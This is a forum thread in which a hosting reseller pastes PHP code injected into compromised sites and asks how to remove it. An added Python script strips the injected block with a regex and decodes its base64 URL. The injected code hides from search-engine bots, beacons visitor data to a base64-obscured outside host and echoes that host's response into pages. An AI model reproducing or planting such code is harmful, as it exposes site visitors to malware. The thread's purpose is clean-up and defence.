The Community Forums


Problem with code inserted in base64_decode php scripts from accounts.

Discussion in 'General Discussion' started by michel.rw, Apr 4, 2012.

  1. michel.rw

    Hi there, I have a serious problem.

    I have several domains hosted in my reseller account, and a few days ago these sites were invaded and the accounts' "php" files were changed.
    By checking these changes, I noticed that the following code had been inserted into the files:

    <?php
    if (!isset($sRetry))
    {
        global $sRetry;
        $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        // NB: this line and the base64_decode line below are cut off in the post (trailing "$")
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(st$
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
                $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&dom$
                $stCurlHandle = curl_init( $stCurlLink );
            }
        }
        if ( $stCurlHandle !== NULL )
        {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            $sResult = @curl_exec($stCurlHandle);
            if ($sResult[0]=="O")
            {
                $sResult[0]=" ";
                echo $sResult; // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }
    ?>

    Analyzing this code, we find that it is an encrypted link that redirects to a page on a server that installs malware on a PC.
    I urgently need to remove that code, and I cannot find a way to remove it.

    I need help.
    I learned that it would be easier to remove that code from the affected pages with regular expressions.
     
    #1 michel.rw, Apr 4, 2012
    Last edited: Apr 4, 2012
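One way to do the regular-expression clean-up the poster asks about, as an added example (not code from the post, and not a cPanel tool): a Python script that finds the injected block in every PHP file under a docroot, reports it, and strips it after saving a .bak copy. It assumes the block always opens with `<?php` followed by `if (!isset($sRetry))` and closes at the next `?>`, as in the sample above; the function names (`strip_injection`, `clean_tree`, `decode_beacons`, `demo`), the docroot layout and the file contents in `demo()` are all constructed for this example.

```python
"""Locate and strip the `$sRetry` / base64_decode() injection from PHP files.

Added example, not code from the original post. It assumes the injected block
always opens with `<?php` + `if (!isset($sRetry))` and closes at the next `?>`,
as in the poster's sample; every path and file body below is constructed.
"""
import base64
import os
import re
import shutil
import tempfile

# Opening of the injected block, with loose whitespace because the forum
# rendering mangled the original indentation; `.*?` then runs to the first `?>`.
INJECTION_RE = re.compile(
    r"<\?php\s*if\s*\(\s*!\s*isset\s*\(\s*\$sRetry\s*\)\s*\).*?\?>[ \t]*\r?\n?",
    re.DOTALL,
)

# Any base64_decode('...') literal, so the beacon URL can be read for triage
# without executing the PHP.
B64_LITERAL_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")


def decode_beacons(php_source: str) -> list[str]:
    """Return the decoded plaintext of every base64_decode('...') literal."""
    decoded = []
    for literal in B64_LITERAL_RE.findall(php_source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:
            decoded.append("<undecodable:%s>" % literal[:12])
    return decoded


def strip_injection(php_source: str) -> tuple[str, int]:
    """Remove every injected block; return (cleaned source, blocks removed)."""
    return INJECTION_RE.subn("", php_source)


def clean_tree(root: str, dry_run: bool = True) -> dict[str, int]:
    """Walk `root`; map each infected PHP file to its block count.

    With dry_run=False the file is rewritten in place after a .bak copy
    (same mtime/permissions, via copy2) is saved beside it.
    """
    hits: dict[str, int] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                source = fh.read()
            cleaned, count = strip_injection(source)
            if count == 0:
                continue
            hits[path] = count
            if not dry_run:
                shutil.copy2(path, path + ".bak")
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
    return hits


# Constructed sample: a shortened copy of the poster's block glued in front of
# an ordinary index.php. Only the start and end markers matter to the regex.
SAMPLE_INJECTED = """<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
$stCurlHandle = curl_init( $stCurlLink );
if ( $stCurlHandle !== NULL ) { $sResult = @curl_exec($stCurlHandle); echo $sResult; curl_close($stCurlHandle); }
}
?>
<?php
// original site code
echo "hello";
"""

SAMPLE_CLEAN = "<?php\n// untouched file\necho 'fine';\n"


def demo() -> dict[str, int]:
    """Build a throwaway docroot (one infected, one clean file), run a dry
    pass, a real pass and a re-check, and report what each pass found."""
    root = tempfile.mkdtemp(prefix="phpclean-")
    try:
        os.makedirs(os.path.join(root, "blog"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(SAMPLE_INJECTED)
        with open(os.path.join(root, "blog", "wp-config.php"), "w") as fh:
            fh.write(SAMPLE_CLEAN)
        dry = clean_tree(root, dry_run=True)
        real = clean_tree(root, dry_run=False)
        after = clean_tree(root, dry_run=True)
        backups = sum(1 for p in real if os.path.exists(p + ".bak"))
        return {"dry": len(dry), "cleaned": len(real), "left": len(after), "backups": backups}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print("beacon(s):", decode_beacons(SAMPLE_INJECTED))
    print("demo:", demo())
```

Run `clean_tree("/home/<user>/public_html")` with the default dry run first and read the list before passing `dry_run=False`; the .bak copies are what you diff afterwards. `decode_beacons` shows why the base64 string matters: the literal in the post decodes to the URL the block fetches, so grepping every account for that string is a quick way to list infected files before any rewrite. The regex is deliberately tied to this variant's opening; a differently worded injection needs its own anchor, and because the block only fires for user agents that do not contain the search-engine names checked in the `strstr` chain, a page can look clean to a crawler and still serve the beacon to a browser. Removing the block does not close whatever let it be written in the first place.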